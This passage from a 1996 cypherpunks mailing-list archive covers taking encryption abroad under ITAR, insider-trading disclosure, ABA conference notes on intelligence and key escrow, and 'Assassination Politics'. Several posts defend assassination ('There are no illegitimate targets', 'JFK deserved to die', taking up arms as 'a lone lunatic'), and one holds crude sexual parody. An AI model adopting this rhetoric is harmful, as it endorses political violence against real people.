>>> >>> -- >>> I hate lightning - finger for public key - Vote Monarchist >>> unicorn at schloss.li >>> >> >> >>// declan at eff.org // I do not represent the EFF // declan at well.com // >> >> >> >> >>----------------------- Headers -------------------------------- >>From cypherpunks-errors at toad.com Wed Sep 25 15:11:39 1996 >>Return-Path: cypherpunks-errors at toad.com >>Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >>emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for >>; Wed, 25 Sep 1996 15:11:34 -0400 >>Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) >> id AA27335; Wed, 25 Sep 1996 13:11:11 -0600 >>Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA15636 >for >>cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT) >>Received: from eff.org (declan at eff.org [204.253.162.3]) by toad.com >>(8.7.5/8.7.3) with ESMTP id FAA15631 for ; Wed, 25 Sep >>1996 05:06:39 -0700 (PDT) >>Received: (from declan at localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed, >>25 Sep 1996 05:06:38 -0700 (PDT) >>Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT) >>From: Declan McCullagh >>To: Black Unicorn >>Cc: cypherpunks at toad.com >>Subject: Re: Lexis and Privacy - Bill approaches. >>In-Reply-To: >>Message-Id: >>Mime-Version: 1.0 >>Content-Type: TEXT/PLAIN; charset=US-ASCII >>Sender: owner-cypherpunks at toad.com >>Precedence: bulk -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. 
Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From unicorn at schloss.li Wed Sep 25 23:49:19 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 14:49:19 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: <199609252211.RAA02676@manifold.algebra.com> Message-ID: On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > > >> Soon I am going to be going overseas to Japan, and I want to take > > >> my notebook with me so I can keep up with everything, however, I have > > >> encrypted my hard drive and usually encrypt my mail. Is this in > > >> violation of the ITAR to keep everything the same when I go over? > > Gentlemen, us customs does not give shit about what you take out > on your diskettes. > > When I went to Russia recenty, I took PGP for DOS, and no one gave > me any problem. > > IANAL Obviously not, you've just confessed to a felony. > > - Igor. > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From snow at smoke.suba.com Wed Sep 25 23:58:35 1996 From: snow at smoke.suba.com (snow) Date: Thu, 26 Sep 1996 14:58:35 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu> Message-ID: <199609260356.WAA00453@smoke.suba.com> -----BEGIN PGP SIGNED MESSAGE----- HAL wrote: > [AP drivel deleted] > Go talk to someone who is a member of an organisation like the PLO or > Hammas and pretty near the top. If you think that they would be intimidated > for a moment by AP you have another think comming. > If it could the US would have assasinated Saddam by now. 
It can't because it > is too difficult to find out where exactly a person will be. Assassination > attempts against Castro similarly failed. Some would say that 1) Saddam (as a problem) was _created_ by the US, and it would not be in the interest of certain people to have him die. Along the same lines, Castro, while not exactly friendly (and who can blame him) to the US, is also not a threat, and never really has been. Killing him would serve no purpose. Killing some one (the physical act, not the emotional consequences) is easy. Deniability is a little (only a little) tougher. > If you care to look at the history of Cambodia you will see that Lon Nol > assumed the presidency despite the knowledge that there was practically no > chance of defeating the Khmer Rouge and that he would almost certainly be dead > in less than a week as a result. There are always Captains who go down with the ship, Boys who stick their fingers in dykes, and Some fool leading the charge when the odds are overwhelming. This is either the highest calling (to fight back against all odds, and refuse to give in) or pure stupidity (he who runs away lives to fight another day). You pick. > > Both the assumptions AP rests on are utterly false. It is neither possible > to assassinate people at will nor will it intimidate. If by "at will" you mean _any time_ _any where_, yeah. Short of building your own nuclear device, yeah. If you mean there are people who can't be gotten to, then no. Everyman has his price, and his coin. The second time AP is implicated in a murder, and is not stopped, then it will _start_ to intimidate. More likely it will be stopped. > In addition *ANYONE* who attempted to implement AP would be someone *I* > would regard as a tyrant and therefore a legitimate target by the rules > of AP. I would naturally consider it permissible to engage the support of > others in their suppression. 
> Since we now live in the fantasy land of AP I can now wipe out anyone anywhere so I eliminate all AP leaders.

There are no illegitimate targets.

> I think that this type of talk is incredibly dangerous. There are plenty of people on the net who are psychos and if you spread AP drivel around someone is going to act on it. Probably not Jim Bell, more likely a psychopath who lurks on the list but does not post.

Doubtful. It would take more than one talented person. It would take an organization, and a permanent net connection. This would be difficult for a lone psychopath to carry out.

> If you call for people to be murdered - and let us not forget that this is what AP is about you bear the responsibility when someone acts on it.

Bullshit. Is Einstein morally responsible for the Atomic Bomb? Col. Colt for the murders that the guns he created accomplished? Ronald McDonald & his PR firm for all of the obese people in this country?

> I consider AP to be very close to calling for the assassination of the President of the USA. That is a federal crime and there is a law that requires the investigation of any such threats. I suggest that people think *very* carefully before engaging in this dangerous nonsense any further.

Driving 65 is very close to driving 66, which is against the law. I suggest that people think very carefully before driving at 65 miles per hour.

> PS it is not censorship to stop people from advocating murder.

Yes, it is. Especially when other people do it all the time, and don't get punished. Clinton just "murdered" a bunch of people in Iraq. He talked about it, then he did it. He calls it "War". So do I. I am involved in a war for _my_ rights. I will probably lose, but I must do what I determine is right. Assassinating the president would not further my goals. At no time in the foreseeable future would killing the president bring me any closer to my goals. This being so, killing the president would be a stupid idea.
When I joined the Marine Corps, I took an oath to protect this country, the constitution, and the government against all enemies foreign and domestic. To me, the order I wrote them is the order of precedence. The government is attacking the constitution regularly. I do what I can to stop that. If that means taking up arms as either a part of organized revolt, or a lone lunatic, so be it.

Petro, Christopher C. petro at suba.com snow at smoke.suba.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkn+1/ee0/pvOCipAQE6vQP9E3Ra8UqMYZ3TQqyWxipJa5PDdH25ZDEv
NKFPw4LDAoivF9C69criJ65lIDqNTWTOSJXY//yjyG/MkNRuS9UBzPr12PbzVafV
TTY2LPXfuZoUt6AHlA6yAJpZwa3mmifRPTUQbKtc/sMIQJ3ugrZirw6/Wbzra3E+
KEclgyuiiC0=
=zt4Q
-----END PGP SIGNATURE-----

From pgf at acadian.net Thu Sep 26 00:02:17 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 15:02:17 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID:

On Wed, 25 Sep 1996, Timothy C. May wrote:

> Just why do you think I was elliptical in my comments? To type three lines instead of just typing the name? Think about it.

Oh. That organization. I thought it was simply because the topic had been done to death. Speaking of topics being done to death, I'm probably going to cease my subscription to cypherpunks as soon as my subscription to the filtered list is confirmed. (Which is why I'm not following up to Vulis' messages any more... the conversation would probably stop anyway when I stopped seeing his half of the messages, and I probably wouldn't see mine on the filtered list anyway...)

> With Webcrawlers looking for names of organizations--and the Cypherpunks archives show up on such searches--and with some organizations being very quick to sue for perceived defamation....

This brings up something else: the last time I tried to find the cypherpunks archives on a web search they didn't show up. The last time I accessed them was in March, and they were kind-of sick then...
I guess things just got too bad for the archival scheme to handle? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From dlv at bwalk.dm.com Thu Sep 26 00:13:20 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 15:13:20 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: Black Unicorn writes: > On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > > > > >> Soon I am going to be going overseas to Japan, and I want to take > > > >> my notebook with me so I can keep up with everything, however, I have > > > >> encrypted my hard drive and usually encrypt my mail. Is this in > > > >> violation of the ITAR to keep everything the same when I go over? > > > > Gentlemen, us customs does not give shit about what you take out > > on your diskettes. > > > > When I went to Russia recenty, I took PGP for DOS, and no one gave > > me any problem. > > > > IANAL > > Obviously not, you've just confessed to a felony. And I've just forwarded Igor's confession to the Right Reverend Colin James III. Looks like we've got our ITAR test case. :-) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From azur at netcom.com Thu Sep 26 00:13:23 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 26 Sep 1996 15:13:23 +0800 Subject: Insider Trading - What constitutes "Disclosure" ? Message-ID: >Often the choice faced by the investor who has material non-public >information is characterized as "disclose or abstain," meaning that the >investor may either trade after disclosing or abstain from trading on the >information. > >A few people have asked me what constitutes disclosure. > >I've not researched the latest cases, but the generally accepted "best >description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833 >(2d Cir.1968), cert. denied. 
>
> The reading of a news release, which promoted Coates into action, is merely the first step in the process of dissemination required for compliance with the regulatory objective of providing all investors with an equal opportunity to make informed investment judgements. Assuming that the contents of the official release could have been instantaneously be acted upon, at the minimum Coates should have waited until the news could reasonably have been expected to appear over the media of widest circulation, the Dow Jones broad tape, rather than hastening to insure an advantage to himself and his broker son-in-law.
>

It would seem to me that if I operated an open listserver, upon which financial information regularly appeared and which any trader (serious or otherwise) might subscribe, my information should be held in the same legal regard as DJ. If not, the SEC has in effect created a monopoly for Dow-Jones and its ilk and effectively impeded or excluded other news sources (e.g., Internet feeds) as legit means for generating market awareness, and therefore revenue. I and many others occasionally trade on public information from narrower sources than DJ (e.g., market newsletters). Sometimes DJ and others pick up info from these sources and sometimes they don't (or not immediately). Does that mean those trading on this data published not yet picked up by DJ may be trading illegally? If so, this is totally unjust and wrongheaded.

-- Steve

From tcmay at got.net Thu Sep 26 00:14:17 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 15:14:17 +0800 Subject: Taking crypto out of the U.S. Message-ID:

At 10:11 PM 9/25/96, Igor Chudov @ home wrote:

>> >> Soon I am going to be going overseas to Japan, and I want to take my notebook with me so I can keep up with everything, however, I have encrypted my hard drive and usually encrypt my mail. Is this in violation of the ITAR to keep everything the same when I go over?
> >Gentlemen, us customs does not give shit about what you take out >on your diskettes. > >When I went to Russia recenty, I took PGP for DOS, and no one gave >me any problem. I initially responded to the first questioner with a simple "No." (Sent privately.) This answer, because of several points: - encrypted data, his hypo, is not illegal to export under _any_ circumstances - the "personal use" exemption - the Matt Blaze example, where it was obvious U.S. Customs was basically neither interested in nor set up to process "crypto export" situations - the basic fact that U.S. Customs _rarely_ does inspections of outgoing stuff As I've said before, on a trip to Monte Carlo in early '95, I carried out a bunch of magneto-optical disks, containing more than a gigabyte of stuff, including a bunch of crypto products, etc. Needless to say, I boarded my Air France flight without a single glance from U.S. Customs. They were nowhere in sight, in fact, on the outgoing side. I could have had suitcases full of cash, briefcases full of stock certificates, and 100 gigabytes of software. (A college friend of mine is married to a Brooklyn DA. One of the cases she described to me involved prosecuting a guy for smuggling U.S. currency out of the country. She hinted that the only reason he was searched as he left the country was because of a related case.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." 
From dlv at bwalk.dm.com Thu Sep 26 00:21:30 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 15:21:30 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID:

The Deviant writes:

> > > It's widely believed that the New Orleans Mafia (the source of my recent statement about body decomposition in Louisiana swamps) was a prime drive in the assassination of the late President John F. Kennedy.
> > >
> > > I think it's fairly safe to say that having done this didn't do them a damn bit of good. It didn't do anyone else a damn bit of good.
> >
> > JFK deserved to die.
>
> While I neither agree nor disagree with your point, it does seem a bit irrelevant, but that's just MHO.

Well - this thread has very little crypto-relevance (AP itself has questionable crypto-relevance, IMO, and should be discussed in talk.politics.assassination, carried by every honorable Usenet site). But as far as AP is concerned, clearly JFK's death (quite deserved) did not deter other scum like him from seeking political office. Now, if he had been tried (for treason, murder, etc) and died like a criminal, not like a hero, on national TV, that would have done a lot more damage to the image of the office of the president of the United States. Just look back at what Nixon's resignation did. I believe in public hangings after a fair trial.

--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From haggis at brutus.bright.net Thu Sep 26 00:29:15 1996 From: haggis at brutus.bright.net (Hamish) Date: Thu, 26 Sep 1996 15:29:15 +0800 Subject: your mail Message-ID:

Hey Look, the president of the U.S. is on this mailing list!!!!!!!!! Let's tell him what we think of him and his defense department, and his secret service and his. . .well, entire administration and laws (what about that dandy CDA?????????)
From sophi at best.com Thu Sep 26 00:36:07 1996 From: sophi at best.com (Greg Kucharo) Date: Thu, 26 Sep 1996 15:36:07 +0800 Subject: Dyson on anonymity (in WSJ article on our challenge to GA net law) In-Reply-To: <199609252017.NAA24875@eff.org> Message-ID: <3249BC0D.7C6368F4@best.com> I'm glad to see that Ms. Dyson has come around to our way of thinking:-). Stanton McCandlish wrote: > > FYI: > > [...] > Esther Dyson, president of high-tech publisher EDventure > Holdings Inc. and chairwoman of the Electronic Frontier > Foundation, a high-tech civil liberties organization that > is a co-plaintiff in the lawsuit, calls the Georgia law > "brain-damaged and unenforceable," and adds: "How are they > going to stop people from using fake names? Anonymity > shouldn't be a crime. Committing crimes should be a crime." > [...] > > -- > Stanton McCandlish >


mech at eff.org > Electronic Frontier Foundation >
Online Activist From sophi at best.com Thu Sep 26 00:39:00 1996 From: sophi at best.com (Greg Kucharo) Date: Thu, 26 Sep 1996 15:39:00 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: <3249BDB5.1A39AD0D@best.com> I fail to see how the Executive can simply avoid the authority and oversight of the Judicial. Are there other circumstances of this? From my constitutional reading the Judiciary has the right to review any law passed by Congress. The Executive only has the power to enforce, not to unilaterally pass rules unrelated to enforcement. Declan McCullagh wrote: > > At today's SAFE crypto hearing in the House, Congressperns quizzed > Gorelick about what the fuck the administration is trying to do by having > their lackies attach amendments to the omnibus export act that would > prevent judicial review of Commerce Dept export control decisions. It's > already cleared the House. > > "no court shall have power or jurisdiction to review any such decision by > an action in the nature of mandamus or otherwise." > > Bastards. > > -Declan > From jimbell at pacifier.com Thu Sep 26 00:45:25 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 26 Sep 1996 15:45:25 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <199609260534.WAA00788@mail.pacifier.com> At 08:55 PM 9/25/96 -0700, Bill Frantz wrote: >> Nikkei English News, 24 September 1996. >> >> [Mitsubishi] fabricated the chip as a gate array using a >> 0.5 micron CMOS process and its own proprietary >> encryption algorithm MISTY. Operating at a maximum >> input/output speed of 40 megahertz, the chip can handle >> 32 bits per clock cycle. > >Does anyone have a reason not to consider this algorithm snake oil? e.g.: >Was it developed by a well known cryptographer? >Has it been vetted by someone/some organization with reputation? >I other words, why should we trust it? There's not nearly enough information provided to know for sure. 
However, I'd think that any company which went to the trouble to build such a chip (custom, 0.5 micron process, etc) would go to the little extra effort to verify the algorithm is secure. Generally, hardware is held to a higher standard because the difficulty of repair is higher: Usually, you have to replace a chip. Jim Bell jimbell at pacifier.com From azur at netcom.com Thu Sep 26 00:50:48 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 26 Sep 1996 15:50:48 +0800 Subject: Insider Trading - What constitutes "Disclosure" ? Message-ID: >Posted-Date: Thu, 26 Sep 1996 00:40:14 -0400 >Date: Thu, 26 Sep 1996 00:40:14 -0400 (EDT) >From: Black Unicorn >X-Sender: unicorn at polaris >To: Steve Schear >Subject: Re: Insider Trading - What constitutes "Disclosure" ? >MIME-Version: 1.0 > >On Wed, 25 Sep 1996, Steve Schear wrote: > >> >Often the choice faced by the investor who has material non-public >> >information is characterized as "disclose or abstain," meaning that the >> >investor may either trade after disclosing or abstain from trading on the >> >information. >> > >> >A few people have asked me what constitutes disclosure. >> > >> >I've not researched the latest cases, but the generally accepted "best >> >description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833 >> >(2d Cir.1968), cert. denied. >> > >> > The reading of a news release, which promoted Coates into >> >action, is merely the first step in the process of dissemination required >> >for compliance with the regulatory objective of providing all investors >> >with an equal opportuinity to make informed investment judgements. >> >Assuming that the contents of the official release could have been >> >instantaneously be acted upon, at the minimum Coates should have waited >> >until the news could reasonably have been expcted to appear over the media >> >of widest circulation, the Dow Jones broad tape, rather than hastening to >> >insure an advantage to himself and his broker son-in-law. 
>> > >> >> It would seem to me that if I operated an open listserver, upon which >> financial information regularly appeared and which any trader (serious or >> otherwise) might subscribe, my information should be held in the same legal >> regard as DJ. > >I disagree. If the information appears only on your listserver it will >not, in my view, be considered released. You'll note above that the >reading of a news release, which eventually propogated to Canada and New >York, still was not enough to limit liability for Coates. I hardly think >a small circulation electronic mailing list will be considered sufficent >either. > >> If not, the SEC has in effect created a monopoly for >> Dow-Jones and its ilk and effectively impede or excluded other news sources >> (e.g., Internet feeds) as legit means for generating market awareness, and >> therefore revenue. > >Correct. > >> I and many others occassionally trade on public >> information from narrower sources than DJ (e.g., market newsletters). > >But you and others are (I hope) not insiders or direct tipees. >You also note that you trade on "public information." So long as you keep >it that way you should be alright. > >You will be putting yourself in a interesting position if material >non-public information ever shows up on your newsletter and is later the >subject of investigation. > >> Sometimes DJ and others pick up info from these sources and sometimes they >> don't (or not immediately). Does that mean those trading on this data >> published not yet picked up by DJ may be trading illegally? If so, this is >> totally unjust and wrongheaded. > >The case mans what it says. Until the information reaches the sources of >largest distribution it is still "non-public." What is a source of >largest distrubution? Ask a judge. I would simply be careful and >prudent. You could easily be in trouble for trading on information which >you "knew or should have known was material, non-public information." 
> >There is, of course, a distinction between the trader who reads an article >and trades on it and a trader who hears over a mailing list from a >corporate insider that a major fraud in the company has been discovered. > >If your newsletter carries hints of the big merger before it happens and a >trader later points to it as the source of his tip, you could be in >serious trouble. God forbid they get it in your head that you are >distributing inside information. Of course you can imagine the headlines. > >"Internet crime network foiled. Hundreds of subscribers capitalize on >inside information." > >As for unjust and wrongheaded, welcome to the American concept of >securities regulation. > >> -- Steve > >-- >I hate lightning - finger for public key - Vote Monarchist >unicorn at schloss.li > From unicorn at schloss.li Thu Sep 26 00:56:06 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 15:56:06 +0800 Subject: ABA Conference on Law Enforcement and Intelligence - Debrief Message-ID: The American Bar Association Standing Committee on Law and National Security - Law Enforcement and Intelligence Conference - Debrief The ABA's Standing Committee on Law and National Security is one of the more successful Committees to come out of the ABA. It's conferences and early morning breakfast briefings and lectures are attended by some of the leading experts in the fields of National Security, Law Enforcement, and Intelligence and no small number of the beltway power elite. I'm not sure if many people outside the legal community understand the degree to which attorney's have impacted and thrived in both the law enforcement and the intelligence communities. In fact many, if not most, CIA case officers and station chiefs, as well as field operatives, are attorneys or have law degrees. Other intelligence organizations are no different. 
It should come as little surprise then if a committee of the ABA should happen to attract a surprising amount of intelligence professionals. This conference was no exception. Spooks, Feds, Legislators, and even a few Kooks were in attendance. Members of the British, American, Canadian, and German intelligence communities were in attendance. A colleague and I attended the majority of the conference and except where noted the reflections below are a summary of our collective notes and thoughts on the subject matter discussed. I'm taking a broad view of relevance to cypherpunks, but I will omit that which seems clearly not of direct or somewhat indirect interest. Part One: A Changed World for Law Enforcement and Intelligence in the 21st Century Thursday, September 19 7:45 AM Registration and Continental Breakfast 8:15 AM Welcome Remarks Paul Schott Stevens Chair ABA Standing Committee on Law and National Security 8:30 AM I. An Overview of a Changing World. *The Traditional Relationship of Law Enforcement, Foreign Intelligence and National Security (1945-1995): *How Have Other nations Balanced Legal and National Security Requirements and Responded to a Changed World. *The Changed Threats to U.S. National Security- New Problems and Priorities Elizabeth R. Rindskopf Bryan Cave Former General Counsel, Central Intelligence Agency Member, Standing Committee on Law and National Security Ms. Rindskopf outlined the three classic "periods" of intelligence community and mission development in U.S. history and set the stage for the discussions to follow. Interesting subjects she did touch on included section 715 of the Senate intelligence bill. The section allows the law enforcement community to request assistance from foreign intelligence in collection efforts on foreigners outside of the United States. The BNC and BCCI scandals were discussed as a backdrop of the hazards of law enforcement and intelligence separation. 
Zoe Baird Senior Vice President and General Counsel Aetna Life and Casualty Company Member, Standing Committee on Law and National Security.

Ms. Baird discussed the dangers presented by globalization and new technologies. She highlighted the point that crime globalization often follows corporate globalization and the manner in which a single individual's ability to cause harm has increased in scope (The NYNEX Hack). Also interesting was her discussion of the manner in which the more organized elements of criminal activity worked to take advantage of the very open society in the United States (Fund raising, publications, anonymous communications). Those activities once merely violations of criminal law are, she argued, now increasingly national security concerns and that national security events impact elections in very dramatic and direct ways (Atlanta and Israel bombings as examples). Crime, she pointed out, gets about an 80% response in the polls, whereas "National Security and Foreign Policy" get perhaps a 3% response. Merging these elements together serves an administration. She also pointed out the trend toward making these issues generally more accessible to the public. (Specifically by use of language. "Transnational threats"- which was a term of art for non-state terrorism and organized crime- becomes "Global Crime" or "Global Lawlessness.")

Ms. Baird ended by asking how the firewalls between Law Enforcement and Intelligence could be rebuilt with these new considerations in mind.

I considered her a balanced cynic. She managed to get across some very realpolitik notions without much murmuring from the (limited) civil libertarian crowd.

David Bickford Former Legal Adviser to the British Intelligence Services (MI5- MI6)

Mr. Bickford has in past served as a conduit between British Intelligence services and the United States. He is well known and respected among the American and European Intelligence communities. Knowing Mr.
Bickford I can also say that he pays a great deal of attention to who his audience is and speaks to their interests with disarming accuracy. His discussion is important because it is a good insight into what the policy makers in the United States are looking at. He began by highlighting the new international nature of crime. No longer is it confined to power blocs. "Multi-jurisdictional illegality" is increasingly a concern. New highspeed communications channels are a contributor and organized crime groups are possessed of extremely advanced administration abilities. They are leaner and meaner because they use computers, encryption, communications, and use up less resources in administration. The ability to make the organization smaller also makes it harder to penetrate. In this environment, international cooperation is essential. He called for more active and expansive extraterritorial jurisdiction for certain crimes, and lamented his own country's lack of enthusiasm for this concept though they are slowly "coming around." His solutions included the labeling of organizations, even when they are not geographically based, as "illegal international organizations" and using all means to combat them. He envisions a wide cooperation by the G7 to accomplish this, leaving such organizations with no safe haven. Sanctions regimes formerly employed only as against "rogue states" and countries in disfavor should be employed to destroy these illegal international organizations wherever they are. He indicated that the other G7 states should build on the recent Clinton Executive Order which seizes the assets of such organizations which may be located in the jurisdictions of the G7. He called for measures to deny these assets access to the major securities and international finance markets and proposed that only organizations like the NSA could confront and complete these tasks. 
Intelligence, he argued, is the only organization that can keep up with international crime and as a result there should be developed court processes to introduce intelligence into criminal cases while protecting the more sensitive information (sources and methods) as irrelevant. "Evil men" have taken an "early lead." $500 billion a year comes out of the United States alone in money laundering. 400 billion in assets is attributed to drug cartels, 80% of which are Cali Cartel assets. There are over 250 international Russian criminal organizations currently operating. Mr. Phillip Heymann James Barr Ames Professor and Director, Center for Criminal Justice Harvard Law School Member: Standing Committee on Law and National Security [Didn't find his comments particularly relevant] II. Political Challenges in the World Environment *Breakup of the U.S.S.R. *Loss of National Sovereignty and Control by Nation States *Erosion of National Legal Systems Military Threats at the Subnational Level: The Terrorism Dilemma (This looked very much like the section given to the Soviet Analysts, who no longer have much of a job to do). Mr. Morton H. Halperin Senior Fellow Council on Foreign Relations Former Special Assistant to the President and Senior Director for Democracy, National Security Council [Canceled] Mr. Peter Rodman Director, National Security Programs Nixon Center for Peace and Freedom and Former Deputy Assistant to the President for National Security Affairs Mr. Rodman discussed the new "trans-national areas." Terrorism, corruption, economic and criminal activity. 
He discussed the side effects of collapsing empires (the rise of organized crime to enforce property and contract rights that cannot be enforced by the government, the shift of power to the local from the regional and executive areas) and discussed, in this context, the importance of avoiding petty squabbles over issues like trade and the like because they threaten the more important strategic cooperation that will be necessary to battle global and transnational criminal activity.

Ms. Jessica E. Stern Consultant Lawrence Livermore National Laboratory and Former Director, Russian, Ukrainian and Eurasian Affairs, National Security Council

Ms. Stern discussed the severe proliferation problems presented by a weak Russia, particularly the weakening of MPCA (Material Protection Control and Accounting).

11:15 AM III. Technical and Practical Changes in the Relevant World Environment
*Global Technologies Emerge
*"Equal Access" to Advanced Technology by State and Private Actors
*Change in Size, Type and Location of National Security Threats: Challenge for Modern Intelligence and Law Enforcement

Stewart Baker Steptoe and Johnson Former General Counsel, National Security Agency Member, Standing Committee on Law and National Security

Mr. Baker's remarks were brief, but he discussed the evening of the odds with respect to government and private organizations caused by technology.

Admiral William O. Studeman United States Navy (retired) Former Acting Director of Central Intelligence

Admiral Studeman discussed "Information Warfare," pointing out specifically that advanced societies were more vulnerable because of their financial, banking and revenue systems' dependence on computer. Power, air traffic control, public safety and media were also mentioned in passing. Admiral Studeman went on to call for more intense secrecy in law enforcement (not intelligence) as to collection methods and new technology.
He called passionately for funding for the DigiTel program as well as a "key escrow" policy.

Anthony Oettinger Chairman, Program on Information Resources Policy Harvard University

Mr. Oettinger was perhaps the only moderate speaker in the conference. He discussed Executive Order 13010 (establishing the Critical Infrastructure Protection organization) and called for more private sector input in policy making (Banks, markets, businesses want to make their own security arrangements, and are not very interested in paying much attention to the suits at their door who claim 'Hi, we're from the government, we are here to help..') He pointed out the difference between the movements in Airline Security (which is drifting from privately maintained, to publicly maintained) and Internet security (which is doing the reverse). He called for reasoned response to the new threats which did not commit expensive intelligence and law enforcement resources to combat the single hacker. Proper threat assessing is important, and intelligence should be used to pinpoint the weak points.

Walter Pincus National Security Affairs Reporter The Washington Post

Mr. Pincus asked if (a lovely analogy to Chicken Little and ostriches with their heads in the sand). His most interesting remarks regarded the wisdom of dedicating such substantial resources to repel non-strategic efforts to disrupt networks. (Hackers, lone gunmen, etc.) He questioned. Doesn't, after all, a strategic attack require much more preparation? Should we really allow the personality of e.g., Louis Freeh, who has the capital dazzled from his glow, to direct these resources?

12:30 PM Luncheon John Deutch Director, Central Intelligence Agency [Cancelled in the wake of the investigation into alleged CIA drug connections in California]

Part Two: The Implications of a Changed World for a Set of Critical Decisions

2:00 PM IV.
Protections Against New High Tech Dangers; Problems of Encryption, Information Warfare and Computer Theft [forthcoming - remainder of conference and analysis] From Adamsc at io-online.com Thu Sep 26 00:56:50 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 26 Sep 1996 15:56:50 +0800 Subject: Taking crypto out of the U.S. Message-ID: <19960926055511781.AAA230@GIGANTE> On Wed, 25 Sep 1996 06:26:31 -0500 (EST), Adam Shostack wrote: >| >Theres a personal use exemption. Michael Froomkin's web page has a >| >pointer to it. >| What if your laptop gets "stolen"? Or you sell it for a plane ticket home >| after your wallet gets pinched? >You're required to report it to the Feds. RTFU. Yeah, but you can't be persecuted. So what happens if Joe-Cryptographer writes a *great* NSA-stumping crypto program - not for export - and it just happens to get pinched (The police might even recover it!)? Outside distribution w/o penalties... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" From dthorn at gte.net Thu Sep 26 00:58:39 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 15:58:39 +0800 Subject: More proposals for European censorship In-Reply-To: <960925181200_529562477@emout03.mail.aol.com> Message-ID: <324A17BE.4C09@gte.net> PhneCards at aol.com wrote: > Did you know this company is using your email address as part of > an unlawful email bomb? I signed up for this Internet service through GTE. I haven't got the foggiest idea what a "email bomb" is, nor do I care. I can't possibly be doing anything illegal by logging on to this service and receiving and posting email to cypherpunks, and if someone else is, why are you telling me? > I would advise you to write to them at cypherpunks at toad.com > and owner-cypherpunks at toad.com and advise them to stop > using your email address for this type of activity. I don't know what you're talking about. 
Maybe if you dropped the "Computerese" and wrote in plain English, I could understand what you're saying. Are you saying (by analogy) that if someone posted my picture on a milk carton claiming I was lost, that I'd have to write someone a letter of explanation to say I wasn't lost? And how do I *really* know I'm not lost, anyway? I'd prefer that you just leave me alone. > It is illegal to use a invalid return email address. If this > continues, I will > be forced to prosecute the return email address - which they are > making to look like you. Well, this is all quite fascinating, but it's not what I signed up for. Are you suggesting that I would be obliged to witness against someone? I've been in court before, and I know how lawyers like to insist on Yes or No answers, but it rarely works for me. I just get so confused.... > Below is the letter that I received in my email box > In a message dated 96-09-25 13:58:31 EDT, you write: > >Subj: Re: More proposals for European censorship > >Date: 96-09-25 13:58:31 EDT > >From: dthorn at gte.net (Dale Thorn) > >Sender: owner-cypherpunks at toad.com > >To: asgaard at Cor.sos.sll.se (Asgaard) > >CC: cypherpunks at toad.com [text deleted] From dthorn at gte.net Thu Sep 26 01:04:25 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 16:04:25 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609260141.SAA15334@mail.pacifier.com> Message-ID: <324A1C11.5E19@gte.net> jim bell wrote: > At 07:24 AM 9/24/96 -0700, Dale Thorn wrote: > >Lessee if I have this right, now. We have basically three scenarios: > >1. Allow the status quo to continue (the justice system scam now run > >by Janet Reno/Louis Freeh types et al. > >2. Allow the people some democracy in applying justice through AP. > >3. Sometime in the future, build the Gort(?) robots, as in The Day > >The Earth Stood Still, and let them do the job. > That's about it. I long ago noticed the 